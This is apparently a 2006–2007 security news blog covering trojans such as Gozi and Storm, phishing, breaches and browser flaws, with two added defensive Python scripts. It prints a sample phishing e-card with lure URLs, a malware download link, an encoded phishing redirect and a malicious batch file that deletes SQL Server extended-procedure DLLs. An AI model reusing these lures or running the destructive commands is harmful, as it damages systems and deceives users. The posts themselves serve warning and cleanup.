The company is calling this new form of thievery "crimeware," as if we needed another term to keep straight, but it's nasty stuff. In just the month of July, Finjan identified 58 criminals using the MPack toolkit to infect over 500,000 unique users.
MPack may be the most dangerous malware development kit seen yet. It is a PHP-based kit produced by Russian hackers for building mostly keylogging software. It's actually sold and supported by the Russians, complete with a service contract for new versions, and is upgraded every two to four weeks. It's not the first time a service contract has been offered for software that supports the spread of malware.
Full Article Here

Thursday, July 26, 2007
Think you're smart at recognizing online scams? Take a quiz to find out. Visit http://tinyurl.com/ytec4u
McAfee Inc.'s SiteAdvisor service has created a 10-question test to see whether you can spot "phishing" attempts to steal passwords and other personal information by mimicking popular Web sites such as eBay Inc.'s PayPal and News Corp.'s MySpace.

Tuesday, June 19, 2007
Make sure you only mouse over the link in your Hallmark E-Card; it might not be real. Hallmark would never use a bare IP address linking to postcard.exe.


Monday, May 21, 2007

A new, stealthier version of a previously known Russian Trojan horse program called Gozi has been circulating on the Internet since April 17 and has already stolen personal data from more than 2,000 home users worldwide.
The compromised information includes bank and credit card account numbers (including card verification value codes), Social Security numbers and online payment account numbers as well as usernames and passwords. As with its predecessor, the new version of Gozi is programmed to steal information from encrypted Secure Sockets Layer (SSL) streams and send the stolen information to a server in Russia.
The variant was discovered by Don Jackson, a security researcher at Atlanta-based SecureWorks Inc. who also discovered the original Gozi Trojan horse back in January. One of the improvements is its use of a new and hitherto unseen "packer" utility that encrypts, mangles, compresses and even deletes portions of the Trojan horse code to evade detection by standard, signature-based antivirus tools. The original Gozi, in contrast, used a fairly commonly known packing utility called Upack, which made it slightly easier to detect than the latest version.
This version of Gozi also has a new keystroke-logging capability for stealing data, in addition to its ability to steal data from SSL streams. According to Jackson, the keystroke logger appears to be activated when the user of an infected computer visits a banking Web site or initiates an SSL session. It is still unclear how exactly the keystroke logger knows to turn itself on and capture information.
Apart from those two differences, the variant is identical to Gozi, Jackson said. The Trojan horse takes advantage of a previously fixed vulnerability in the iFrame tags of Microsoft Corp.'s Internet Explorer to infect systems. Users typically appear to be infected when visiting certain hosted Web sites, community forums, social networking sites and those belonging to small businesses.
The original Trojan horse stole more than 10,000 records containing confidential information belonging to about 5,200 home users, companies, government agencies and law enforcement organizations before being detected. The server to which the data was being sent had a very professional-looking front end that allowed users to log into individual accounts, view indexed data and get results from queries based on certain fields such as URL and form parameters.

Friday, May 11, 2007
University of Missouri officials said campus computer technicians confirmed a breach of a database last week by a user or users whose Internet accounts were traced to China and Australia.
The hacker accessed personal information of 22,396 University of Missouri-Columbia students or alumni who also worked at one of the system's four campuses in St. Louis, Kansas City, Rolla or Columbia in 2004.
The hacker obtained the information through a Web page used to make queries about the status of trouble reports to the university's computer help desk, which is based in Columbia. The information had been compiled for a report, but the data had not been removed from the computer system.
In January, a hacker obtained the Social Security numbers of 1,220 university researchers, as well as personal passwords of as many as 2,500 people who used an online grant application system.
The university is contacting people affected by the latest breach and providing instructions on how to monitor their credit reports and other financial records for suspicious activity, officials said.

Sunday, May 06, 2007
Symantec Corp. researchers Friday warned of an in-the-wild Trojan horse that poses as a Windows activation program to dupe users into entering credit card information in an attempt to reanimate their machines.
Dubbed Kardphisher, the Trojan is nothing much technically, reported Takashi Katsuki, a Symantec researcher. But its author has "obviously taken great pains to make it appear legitimate."
Once the Trojan's installed, it throws up an official-looking screen that claims the user's copy of Windows was activated by someone else. "To help reduce software piracy, please re-activate your copy of Windows now," the screen reads. "We will ask you for your billing details, but your credit card will NOT be charged."
Selecting "No," said Katsuki, shuts down the PC. "Yes," meanwhile, takes the user to a second screen where he or she is asked to enter her name and credit card information, which is then transmitted to the hacker's server. "This Trojan teaches us all a good lesson," added Katsuki. "Trust no one."
An external computer hard drive containing the personal, bank and payroll information of up to 100,000 former and current Transportation Security Administration (TSA) employees was reportedly stolen from a human resources office in Crystal City, VA. The Federal Bureau of Investigation and U.S. Secret Service are now helping the TSA investigate the theft -- FBI is conducting the investigation, with the Secret Service conducting a "forensic review of equipment and facilities."
The TSA learned about the missing hard drive sometime Thursday, but the agency informed possibly affected employees Friday evening -- a delay which has upset some employees. TSA spokesperson Ellen Howe reassured agency employees by stating the TSA was "not trying to stall."
"TSA has no evidence that an unauthorized individual is using your personal information, but we bring this incident to your attention so that you can be alert to signs of any possible misuse of your identity," said Kip Hawley, TSA Administrator.
The TSA is unaware if the hard drive has left its premises. The hard drive contained sensitive information on employees who worked for the TSA from January 2002 until August 2005. The agency employs almost 50,000 people and is the agency responsible for securing transportation systems in the country, including airports and railroads.
Letters were sent out to all affected employees promising one year of credit monitoring services.

Sunday, April 22, 2007
A hacker managed to break into a Mac and win a $10,000 prize as part of a contest started at the CanSecWest security conference in Vancouver.
In winning the contest, he exposed a hole in Safari, Apple Inc.'s browser. "Currently, every copy of OS X out there now is vulnerable to this," said Sean Comeau, one of the organizers of CanSecWest.
The conference organizers decided to offer the contest in part to draw attention to possible security shortcomings in Macs. "You see a lot of people running OS X saying it's so secure and frankly Microsoft is putting more work into security than Apple has," said Dragos Ruiu, the principal organizer of security conferences including CanSecWest.
Initially, contestants were invited to try to access one of two Macs through a wireless access point while the Macs had no programs running. No attackers managed to do so, and so conference organizers allowed participants to try to get in through the browser by sending URLs via e-mail.
Dino Dai Zovi, who lives in New York, sent along a URL that exposed the hole. Since the contest was only open to attendees in Vancouver, he sent it to a friend who was at the conference and forwarded it on.
The URL opened a blank page but exposed a vulnerability in input handling in Safari, Comeau said. An attacker could use the vulnerability in a number of ways, but Dai Zovi used it to open a back door that gave him access to anything on the computer, Comeau said. The vulnerability won't be published. 3Com Corp.'s TippingPoint division, which put up the cash prize, will handle disclosing it to Apple.
The prize for the contest was originally one of the Macs. But on Thursday evening, TippingPoint put up the cash award, which may have spurred a wider interest in the contest.
One reason Macs haven't been much of a target for hackers is that there are fewer to attack, said Terri Forslof, manager of security response for TippingPoint. "It's an incentive issue. The Mac is not as widely deployed of a platform as say Windows," she said. In this case, the cash may have provided motivation.

Monday, March 26, 2007
JavaScript coding errors and Web developers who are inexperienced at working with emerging programming techniques represent serious threats to the security of many Internet sites and the people who visit them, according to malware researchers.
Speaking at the ongoing ShmooCon hacker convention on March 24, Billy Hoffman, lead research engineer at Atlanta-based software maker SPI Dynamics, detailed what he views as an epidemic problem in today's online world. SPI markets penetration testing tools used by businesses to ferret out security issues from their online sites and applications.
The proposed threat is centered on the prevalence of JavaScript errors and insecure use of so-called Web services programming languages such as AJAX -- which combines asynchronous JavaScript with XML -- in many popular Web sites and applications.
In addition to opening holes in Web applications, Hoffman illustrated how JavaScript and AJAX-based tools can be used by hackers to find new vulnerabilities online, and build XSS (cross-site scripting) attacks that can move from one online domain to another, which he cited as a relatively cutting-edge malware development.
"In the last two years, we've seen JavaScript go from stealing cookies to doing key-logging, screen-scraping and all sorts of phishing attacks," Hoffman said. "JavaScript used to be something that was more annoying than anything, but now it's being used in port scanning, to create self-propagating malware and to steal browser histories."
The researcher, who said that JavaScript vulnerabilities are present in sites maintained by everyone from well-known online retailers to large financial services companies, demonstrated a proof-of-concept exploit based on a JavaScript flaw on CNN.com, and how it could be used to manipulate content on the news site's pages. The issue was reported in security forums several months ago, and sent to CNN by researchers, but it still hasn't been fixed.
Malicious-code writers are using the same techniques to create cross-site scripting threats -- malware attacks that inject code into end users' browsers via holes in legitimate sites -- to mislead consumers into handing over their passwords and giving hackers access to their personal information, according to the researcher.
PayPal and MySpace.com are among the major Web properties that have been targeted by major JavaScript-based XSS attacks in recent months. More Here

Saturday, March 24, 2007
Another Trojan horse is spreading through the Internet telephone network of Skype Ltd.
The malicious code, known as both Warezov and Stration, is similar to an earlier version detected in February, but with a new URL (uniform resource locator) and a new version of the malicious code, according to an alert posted Thursday by Websense Inc.
Websense warns Skype users to watch for the message "Check up this," with a URL containing a hyperlink.
The code itself isn't self-propagating, but when it runs, the URL is sent to everyone on the user's contact list.
When users click on the link, they are redirected to a site that is hosting a file named file_01.exe. Users are then prompted to run the file and if they do, several other files are downloaded and run. The downloaded files are other versions of the Warezov/Stration malicious code.
However, that server doesn't appear to be operating, according to Websense.

Wednesday, March 21, 2007
It's the early 21st Century, the United States is the reigning capital of computer attacks, hackers have become international crime rings, and you can buy a stolen credit card number for as little as $1 or a complete identity for $14.
This might read like near-future science fiction, but it's reality, according to a new security report released Monday by Symantec, covering the last six months of 2006.
The Internet Security Threat Report, issued twice yearly by the computer security firm, paints a grim picture. "Attackers are now refining their methods and consolidating their assets to create global networks that support coordinated criminal activity," the report stated.
While a recent report from McAfee showed that Internet domains from Romania, Russia, and the tiny island of Tokelau were among the riskiest in relative terms, the Symantec report found that the U.S. is the source of about 31 percent of all malicious computer activity, beating China (7 percent) and Germany (7 percent).
As for servers used for buying or selling stolen personal information, 51 percent were located in the U.S.
In most areas profiled in the report, the situation has gotten worse. Nearly 30 percent more computers are part of botnets than the previous six months. Trojans can take over a computer without the user knowing it, turning it into a zombie machine used for pumping out spam, launching denial-of-service attacks, or participating in other nefarious activities at the behest of the remote hackers.
On a given day in the period the report covered, there were an average of about 64,000 active bot computers, with China having the highest number.
If you think you're seeing more and more junk mail, you're right. Spam makes up an astounding 59 percent of all email traffic, the report said, an increase of 5 percent over the first half of the year.

Wednesday, March 14, 2007
PayPal has been dying! This has got the attention of the media. Which gets more attention from the general public. Which gets more attention of the media. Eventually it'll get the attention of law enforcement. With Enron and MCI going down, people realize again that just because you are a big publicly traded business doesn't mean you are honest. (FAR FROM IT!)
In addition, we've been getting interview requests from additional media. It started with Forbes several months ago. But as each of them picks up the story, so will 10 more. We now have reached "critical mass." We are too big to ignore anymore. So now the media has to pay attention. Now is the time to strike back harder than ever. Not with truck bombs or pipe-wielding thugs, but with our keyboards, telephones, and pens.

There are options; here is but one.
As promised, Microsoft Corp. did not unveil any security fixes for March. But it did push out several other patches it deemed "high priority," including two for Windows Vista.
The last time Microsoft went a month without releasing security fixes was September 2005.
Among the four updates Microsoft pegged as "non-security, high-priority" today were the usual monthly revamp of the Microsoft Malicious Software Removal Tool and new signatures for the Outlook 2003 and Outlook 2007 antispam filters.
One Vista-specific update was also on the list, as was another that affected both XP and Vista.
The first, dubbed "March 2007 Windows Vista Application Compatibility Update," added compatibility "shims" -- code that makes an application think it's actually running on a pre-Vista PC -- for older Windows titles, including Trend Micro's Internet Security, Windows Server 2003 (SP1) Administration Tools Pack and RealNetworks' RealPlayer 6.0.12.
The second was another revision to the Windows Media Format 11 SDK (software development kit) code. In the associated support document, Microsoft said that the update corrected a problem that some portable music players had in synchronizing data with subscription services.
The rare no-patch Tuesday caught some security analysts and professionals trying to figure out how to spend their free time.

Tuesday, March 06, 2007

Monday, March 05, 2007
Security researchers have found a way to use JavaScript to map a home or corporate network and attack connected servers or devices, such as printers or routers.
The malicious JavaScript can be embedded in a Web page and will run without warning when the page is viewed in any ordinary browser, the researchers said. It will bypass security measures such as a firewall because it runs through the user's browser, they said.
"We have discovered a technique to scan a network, fingerprint all the Web-enabled devices found and send attacks or commands to those devices," said Billy Hoffman, lead engineer at Web security specialist SPI Dynamics. "This technique can scan networks protected behind firewalls such as corporate networks."
A successful attack could have significant impact. For example, it could scan your home network, detect a router model and then send it commands to enable wireless networking and turn off all encryption, Hoffman said. Or it could map a corporate network and launch attacks against servers that will appear to come from the inside, he said.
"Your browser can be used to hack internal networks," said Jeremiah Grossman, the chief technology officer at Web application security company WhiteHat Security. Both SPI Dynamics and WhiteHat Security came up with the JavaScript-based network scanner at about the same time, he said. The companies plan to talk about their findings at next week's Black Hat security event in Las Vegas.
Full Article

Friday, February 23, 2007
The Storm worm that wreaked havoc in January has opened up a new front in its war against users—instant messaging.
The Trojan virus that was responsible for countless spam e-mails sent around the globe has spawned a new variant that is using AOL Instant Messenger, Google Talk and Yahoo Messenger to proliferate. The worm attacks by detecting when someone is chatting and sending out a message with a link to the first stage of malware on a site. If the user clicks the link, the first stage will execute.
"The botnet handlers will periodically inject new commands into this peer-to-peer network, and one of the first things they do is tell the infected machines to download several executables," explained Jose Nazario, software and security engineer for Arbor Networks.
Click here to read about research showing that IM malware attacks are on the rise.

Saturday, February 17, 2007
Two of the flaws could allow an attacker to execute code on an unpatched system, Apple said. Patches are now available on Apple's Web site or through the Software Update selection under the Apple menu on a Mac.
Apple noted that proof-of-concepts for the flaws were posted on the Month of Apple Bugs Web site. But it doesn't appear that attack code has surfaced using the concepts outlined by the project. Apple has fixed several flaws identified during the course of January by the project, but some remain open.
The two flaws that could lead to arbitrary code execution are found in Finder and iChat. There's a buffer overflow flaw in Finder that could allow an attacker to take control of a system by "enticing a user into mounting a malicious disk image," or tricking someone into enabling local access of a file supposedly stored on a remote server. Apple credited Kevin Finisterre, one of the participants in the Month of Apple Bugs project, for reporting the issue, something it did not do on the three other flaws patched on Thursday.
The other patch, for iChat, fixes an issue in which a user could click on a malicious URL in a chat session and trigger an overflow, possibly opening the system to an attacker.
I cannot understand this from the most arrogant group of people on the planet. The OS that claims to be the best solution known to man has flaws? What next, no Santa Claus or the Tooth Fairy? Perhaps we may not have to watch the stupid commercials anymore with PC and Mac.

Wednesday, February 14, 2007
In an article posted Feb 13, 2007, it appears that our brilliant law enforcement agents have finally figured out that criminals can hang out in unsecured WiFi hotspots.
What I find so odd about this, honestly, is that it appears none of them must have ever used one. Honestly, if you can attach to any network without some level of difficulty, you should ask yourself why. Then disconnect and leave.
According to a report in this week's Washington Post, the 46,000 public access Wi-Fi points scattered across the U.S. offer a new vehicle for criminals to carry out their evil business. Law enforcement authorities, who so far have been focusing their investigations primarily on child pornography and other exploitation of children, say they are growing concerned that the anonymous use of unsecured wireless networks will grow.

Monday, January 01, 2007
This is what the typical phish looks like, as sampled from the filtering servers. However, the URLs below are actually being redirected to http://manabi-tai.net/postcard.jpg.exe in the dumps we have sampled. The links here have been removed.
A Greeting Card is waiting for you at our virtual post office! You can pick up your postcard at the following web address:
http://www.all-yours.net/u/view.php?id=a0190313376667
If you can't click on the web address above, you can also
visit E-Greetings at http://www.all-yours.net/
and enter your pickup code, which is: a0190313376667
(Your postcard will be available for 60 days.)
Oh -- and if you'd like to reply with a postcard,
you can do so by visiting this web address:
http://www.all-yours.net/
(Or you can simply click the "reply to this postcard"
button beneath your postcard!)
We hope you enjoy your postcard, and if you do,
please take a moment to send a few yourself!
Regards,
1001 E-Greetings and Postcards
http:///www.all-yours.net/

Sunday, December 31, 2006

We observed large scale spam (mass mailing) of 3 different variants of the W32/Tibs downloader. The message arrives with the subject “Happy New Year” and an attachment “Postcard.exe”. This is a Trojan/Downloader that downloads additional malware onto an infected machine. The downloaded malware harvests e-mail addresses from a victim machine and uploads it to a remote host to further spam. Detection for this was promptly added and definition files released.

This shot was taken off of just one MX Filter server in our network.

This is the weekly shot, which will indicate just how many of these are being trapped for Saturday.

Thursday, December 28, 2006

Surely anyone can see that the URL first goes to Google and then gets redirected to Hong Kong. What I find odd is that I have seen at least 20 copies of this email in one day, yet neither the provider in Hong Kong nor Google has taken action.
Our mail servers are already filtering against this URL: http://www.google.com/url?q=%68%74%74%70%3A%2F%2F566441026785887484-ma.%76%68%61%75%65%6F%2E%68%6B/%48S%42C/%73ec%75%72e/l%6Fg%69n/?id=25&account=61b6USrKjUva-0288. It would seem that Google could at least ensure it is not party to phishing scams like this and break the URL as well.
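To see where such a redirect actually lands without visiting it, here is an added example (not part of the original post) that peels the percent-encoded q= parameter off a google.com/url link and reports the final host; the sample URL is constructed to mirror the shape of the one above, with a placeholder host.

```python
"""Decode redirector links of the google.com/url?q=... kind offline.

Added example, not code from the original post.  SAMPLE_URL is a
constructed stand-in: same layout as the link quoted in the post
(percent-encoded scheme, host and path inside the q= parameter), but
pointing at a placeholder host that does not exist.
"""
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters commonly used by redirectors to carry the target URL.
REDIRECT_PARAMS = ("q", "url", "u", "redirect", "target", "dest")
MAX_HOPS = 5  # bound on nested redirects / nested percent-encoding

# Constructed sample: decodes to http://123456-ma.phish.example/bank/secure/login/?id=25
SAMPLE_URL = (
    "http://www.google.com/url?q=%68%74%74%70%3A%2F%2F123456-ma."
    "%70%68%69%73%68.%65%78%61%6D%70%6C%65/%62ank/%73ec%75%72e/l%6Fg%69n/"
    "?id=25&account=abc"
)


def percent_decode_all(text: str) -> str:
    """Undo repeated percent-encoding (%2568 -> %68 -> h) until it is stable."""
    for _ in range(MAX_HOPS):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def _nested_url(query: str):
    """Return the first absolute http(s) URL carried in a redirect parameter."""
    params = parse_qs(query)  # parse_qs already percent-decodes values once
    for name in REDIRECT_PARAMS:
        for value in params.get(name, []):
            candidate = percent_decode_all(value)
            if urlsplit(candidate).scheme in ("http", "https"):
                return candidate
    return None


def follow_redirect_params(url: str):
    """Peel redirector layers off a URL, making no network request.

    Returns a list of (host, decoded_path) tuples, outermost first; the
    last entry is where a victim who clicked the link would end up.
    """
    chain = []
    current = url
    for _ in range(MAX_HOPS):
        parts = urlsplit(current)
        chain.append(((parts.hostname or "").lower(), percent_decode_all(parts.path)))
        nested = _nested_url(parts.query)
        if nested is None or nested == current:
            break
        current = nested
    return chain


def same_site(host: str, site: str) -> bool:
    site = site.lower()
    return host == site or host.endswith("." + site)


def is_suspicious_redirect(url: str, trusted_site: str,
                           keywords=("login", "secure", "account", "signin")) -> bool:
    """True when a link on trusted_site bounces to another host whose
    path looks like a credential page; this is the pattern the post describes."""
    chain = follow_redirect_params(url)
    if len(chain) < 2:
        return False
    first_host, _ = chain[0]
    final_host, final_path = chain[-1]
    if not same_site(first_host, trusted_site) or same_site(final_host, trusted_site):
        return False
    return any(k in final_path.lower() for k in keywords)


if __name__ == "__main__":
    for host, path in follow_redirect_params(SAMPLE_URL):
        print(f"{host}{path}")
    print("suspicious:", is_suspicious_redirect(SAMPLE_URL, "google.com"))
```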

Sunday, December 24, 2006
StopBadware.org and the Center for Democracy and Technology (CDT) have teamed up to file a formal complaint with the Federal Trade Commission (FTC) against FastMP3Search.com.ar for distributing badware to unsuspecting Internet users.
FastMP3Search.com.ar is a site that offers MP3s for download -- however, it requires users to download a plugin in order to download these songs. Unfortunately, this plugin comes bundled with a ton of adware, Trojan horses, and other forms of badware -- none of which is disclosed to the user. We've written up an in-depth report on the FastMP3Search Plugin that explains all of the bad behaviors that users are subjected to when they download this application. For a summary of those behaviors, check out our blog post. Prof. John Palfrey has also posted his thoughts on the subject on his own blog.
Related links:
StopBadware and CDT's FTC complaint
StopBadware's report on the FastMP3Search Plugin
With Christmas fast approaching, Santa Claus reached out for a little help from Stopbadware.org this week.
The consumer advocacy group said it was approached by an Incline Village, Nevada, man who had legally changed his name to Santa Claus, who asked them to help figure out why his Web site was being flagged by Google's Web site filters.
It turned out that Santa's Web site had been hacked.
On Friday, the Web site was still downloading malicious software, according to Roger Thompson, chief technology officer with Exploit Prevention Labs. It exploits a bug in Internet Explorer that Microsoft patched last August, meaning that people running older versions of the browser could be at risk, Thompson said via instant message.
"The site is hacked," he said. "If you are not patched, it uses an exploit to silently install a huge amount of adware and spyware."
The original problem was soon resolved by Stopbadware.org, but on Friday malware had again cropped up on the Web site.

Saturday, December 09, 2006
It is that time again and these bogus postcards are appearing once again. By now everyone should mouse over any link in their email they think is questionable. Though if anything is questionable, just don't do it. Here is a prime example where clicking the link will try to execute an application. Don't find out, just don't! No postcard is worth it. The return address, member@PostCard.ORG, is not the same site as postcards.org. Both these domains seem legit, but then who cares. No postcard or e-card should want you to run a .exe! It seems both should be warning people about the scam.


Sunday, December 03, 2006
I must post this hack which has come to our attention, if for no other reason than to save some other administrators some time. First I found the existence of a service called network.exe within System32, though as we all know the name is not important. Look for any unknown service running. Search your registry keys and kill the reference that starts this service.
You will know you have the problem when you cannot click on anything within Enterprise Manager, like a database or Logins, and go to Properties. The error that appears at this point is related to xpstar.dll. Well, you can copy the files from another SQL install or simply run SP4 for SQL 2000 again. But this only fixes SQL; it does not get to the root of the problem.
The cause is a .bat or .cmd which has been inserted to do the dirty work. Search your system for the offending file; in this case it was known as a761.bat, but again it can be named anything. Then remove the registry entry that tells the .bat to run when you log on, or you have not beaten anything yet.

So let's look at the .bat file:
net stop mssqlserver
net stop mssqlserver /Y
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\odsole70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xplog70.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\odsole70.dll
net start mssqlserver
So after we are done making sure the bad code has been removed, make sure the files are back in place; as I said, this can be done either by copying them or by reinstalling SP4 for SQL 2000.

I won't go into how we stop the badguy from returning. That is up to each administrator what method you want to take. I offer this only as a way to get you out of trouble and allow you the time to think about how they did it and how to prevent it.
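As an added example, not code from the original post, here is a small triage script that reads a start-up .bat/.cmd like the one above and lists the lines that stop MSSQLSERVER or delete the extended stored procedure DLLs from Binn, so an administrator can confirm what a suspicious script does before removing its Run key. The embedded sample is the batch text quoted above; the 8.3 short-name mapping (PROGRA~1, MICROS~1) is an assumption based on the default install path.

```python
"""Triage a start-up batch file for SQL Server extended-procedure tampering.

Added example, not code from the original post.  SAMPLE_BAT is the batch
text quoted in the post.  SHORT_NAMES is an assumption: the 8.3 aliases of
the default SQL Server 2000 install path, so both spellings of the same
path in the script are recognised as the same file.
"""
import re

# DLLs the quoted script removes; they back xp_cmdshell, sp_OA* and other
# extended stored procedures in SQL Server 2000.
XP_DLLS = {"xplog70.dll", "odsole70.dll", "xpstar.dll"}

SHORT_NAMES = {  # assumed 8.3 aliases of the default install directories
    "progra~1": "program files",
    "micros~1": "microsoft sql server",
}

COMMENT_RE = re.compile(r"^\s*(?:rem\b|::)", re.IGNORECASE)
NET_RE = re.compile(r"^\s*net\s+(stop|start)\s+(\S+)", re.IGNORECASE)
DEL_RE = re.compile(r"^\s*(?:del|erase)\b\s*(?:/\w\s+)*(.+?)\s*$", re.IGNORECASE)

# The batch file quoted in the post, embedded as the sample input.
SAMPLE_BAT = r"""net stop mssqlserver
net stop mssqlserver /Y
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\odsole70.dll
DEL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xplog70.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\xpstar.dll
del c:\PROGRA~1\MICROS~1\MSSQL\Binn\odsole70.dll
net start mssqlserver
"""


def normalise_path(path: str) -> str:
    """Lower-case, strip quotes, unify separators and expand known 8.3 names."""
    parts = path.strip().strip('"').lower().replace("/", "\\").split("\\")
    return "\\".join(SHORT_NAMES.get(p, p) for p in parts)


def triage_batch(text: str):
    """Return (line_no, category, detail) findings for each actionable line.

    Categories: service_stop / service_start for the MSSQLSERVER service,
    xp_dll_delete for removal of an extended-procedure DLL under MSSQL\\Binn,
    and delete for any other file deletion.
    """
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or COMMENT_RE.match(line):
            continue
        m = NET_RE.match(line)
        if m and m.group(2).lower() == "mssqlserver":
            findings.append((no, "service_" + m.group(1).lower(), "mssqlserver"))
            continue
        m = DEL_RE.match(line)
        if m:
            target = normalise_path(m.group(1))
            name = target.rsplit("\\", 1)[-1]
            if name in XP_DLLS and "\\mssql\\binn\\" in target:
                findings.append((no, "xp_dll_delete", target))
            else:
                findings.append((no, "delete", target))
    return findings


def deleted_xp_dlls(text: str) -> set:
    """Names of the extended-procedure DLLs the script removes (to restore)."""
    return {d.rsplit("\\", 1)[-1] for _, cat, d in triage_batch(text) if cat == "xp_dll_delete"}


if __name__ == "__main__":
    for no, cat, detail in triage_batch(SAMPLE_BAT):
        print(f"line {no}: {cat}: {detail}")
    print("DLLs to restore from another install or SP4:", sorted(deleted_xp_dlls(SAMPLE_BAT)))
```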

Thursday, November 30, 2006
A critical security vulnerability in an ActiveX control used by Internet Explorer could allow malicious hackers to use Adobe's Reader and Acrobat software to launch PC hijack attacks, according to a warning from Adobe Systems.
The San Jose, Calif., company released a security support advisory with pre-patch workarounds and warned that multiple unpatched flaws could cause software crashes and "potentially allow an attacker to take control of the affected system."
Affected software includes Adobe Reader 7.0.0 through 7.0.8 and Adobe Acrobat Standard and Professional 7.0.0 through 7.0.8 on the Windows platform. The bugs are only triggered when using Internet Explorer. Users of other browsers are not affected.
Adobe said it is working on a comprehensive patch that will ship "soon" and stressed that an upcoming upgrade to the widely used Adobe Reader program is vulnerable to this issue.

Monday, November 27, 2006
It appears people still have no ability to know when they are being scammed. It is those people we are going to focus on. Since you seem not to know who you are, please just read this and, of course, look at the PowerPoint presentation.
Some useful tips: when you go to an ATM, take your cell phone with you. If someone is being overly friendly, take plenty of pictures. If the bank is open, just go inside. Whatever the situation, never let your PIN be revealed; NEVER is there a need for a third hand, NEVER.
If you have taken plenty of pictures of Mr. Friendly trying to help and you go outside empty-handed, make sure to take pictures of anyone else out in the open. It will be clear who that person is when Mr. Friendly and the other person meet up and leave together. If there is a vehicle, take the license number too. Though I doubt that once you start clicking, these people are going to feel comfortable enough to drive away. You still have the edge since they are assuming you are a chump.
ATM_THEFTS.pps (557.5 KB)

Friday, November 24, 2006
Just a few years ago Windows users, even responsible Windows users, had good reason to be fearful of the attack that would slip past their defenses or their notice. Things have changed. Nobody should ever be complacent, but a responsible user can be confident that defensive software and good habits will protect them. More interestingly, attacks just aren't what they used to be.
A report by Alexander Gostev, senior virus analyst at Kaspersky Lab, indicates that innovation in malware development is stagnant. There have been no major developments in some time. In fact, there have been no major attacks since the release of Zotob in August 2005.
Zotob, incidentally, targeted mainly Windows 2000 systems and XP SP1 to a lesser degree. What Microsoft has been saying about XP SP2 is true: Users are much safer running XP SP2 than earlier versions of Windows. Their own data from their Malicious Software Removal Tool (Word .doc file) shows as much, and in fact probably understates the matter.
There have been a number of small attacks. Some of them, like the WMF vulnerability, recede into the background of the malware scene and will be with us for a long time. Perhaps the most prominent security term of 2006 was "targeted attack." We had quite a few of them, mostly centered around zero-day vulnerabilities in Microsoft Office. See the Kaspersky report for more interesting details on these vulnerabilities.
The focus on vulnerabilities generally is another point in the report. There is little innovation anymore in malware, except where it involves the exploit of a vulnerability, especially a zero-day exploit. But even these are often less of a threat than they used to be. A few years ago vulnerabilities brought us attacks like Blaster and Sasser, where users could be infected over the Internet while they were asleep. Now the exploit usually involves substantial user action and can often be blocked by anti-virus software.
Using Mozilla Firefox's built-in Password Manager to keep track of your browser's passwords? It makes site logins faster but it also could help malicious sites steal your passwords. The bug, which has been known to Mozilla for at least 10 days, remains unpatched and exploits as well as a proof of concept exist in the wild.
"I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!" Security Researcher Robert Chapin wrote in a November 12th e-mail posted in the bugzilla bug tracking system.
"The underlying method was so obvious that it should have raised multiple warnings," Chapin continued. "There were none at all."
The flaw allows a maliciously crafted page to auto-fill a form with credentials intended for another site. Apparently, there is no warning in Firefox 2.0 or previous versions that the credentials are being pulled for the wrong site and submitted to a third party. Details of the flaw first became public this week. Mozilla developers do not yet have a fix.
"Since this bug is an in-the-wild attack we're not protecting anyone by hiding the details anyway," Mozilla developer Daniel Veditz wrote in a bugzilla entry. "Up to now, browser makers have focused on user convenience and assumed sites with valuable passwords would be well-written. But they have bugs just like we have bugs so we might have to be more defensive." Solutions? Surf carefully.
Or just don't use the feature until a fix comes out. Security outfit FrSIRT (the French Security Incident Response Team) recommends that users disable the "Remember passwords for sites" feature in the Options menu.
Microsoft Corp. has initiated 97 lawsuits throughout Europe and the Middle East during its eight-month investigation into fraudulent Web pages, with another 32 criminal complaints filed in cooperation with local authorities, the company said Wednesday.
All of the cases are against individuals who attempted to capture the login and password details of users by constructing fraudulent Hotmail and MSN.com sign-in pages, said Jean-Christophe Le Toquin, a Microsoft attorney. A total of 253 sites were investigated, he said. Microsoft's Global Phishing Enforcement program, started in March, aims to curtail fake Web sites built by criminals trying to obtain financial information or passwords by tricking users, so-called "phishing." The company uses its technology to crawl the Internet to find Web pages that look suspicious.
Once a phishing site has been identified, Microsoft either files a criminal complaint or forwards the information to prosecutors, depending on the country’s legal requirements. By country, Turkey led the pack with 50 criminal complaints, followed by 28 in Germany and 11 in France. Legal actions were also filed in the United Arab Emirates, Italy, Morocco, the Netherlands and the U.K.
Microsoft has settled with four phishers, all 16- to 20-year-old males, in France and Norway, Le Toquin said. Each of those pursued in France paid Microsoft $2,564, a fine the company felt is in proportion to their actions, he said.
Many of the fake sites were created by the phishers to trick their peers into divulging their login credentials. The phishers would try to lure their friends to the fake pages through links sent by instant messaging programs. Microsoft said it will continue its investigation, particularly focusing on phishing sites connected with more sophisticated hacking.
An independent vulnerability analyst working as part of the "Month of Kernel Bugs" campaign released the details necessary to attack the hole in OS X on Nov. 22, revealing the manner in which hackers could target the glitch, which affects the way Apple's software handles disk image files.
The researcher, identified only by the screen name "LMH," issued the exploit via a post on the Kernel Fun Web site. "Mac OS X fails to properly handle corrupted image structures, leading to an exploitable denial of service condition," LMH wrote in his latest blog.
"Although it hasn't been checked further, memory corruption is present under certain conditions." The researcher said that the demonstration exploit offered on the site would be unlikely to allow arbitrary code execution if applied by attackers, however, the analyst indicated that the flaw could be taken advantage of by malware writers by targeting the manner in which Cupertino, Calif.-based Apple's Safari browser downloads online image files.
Apple representatives didn't comment on the exploit.
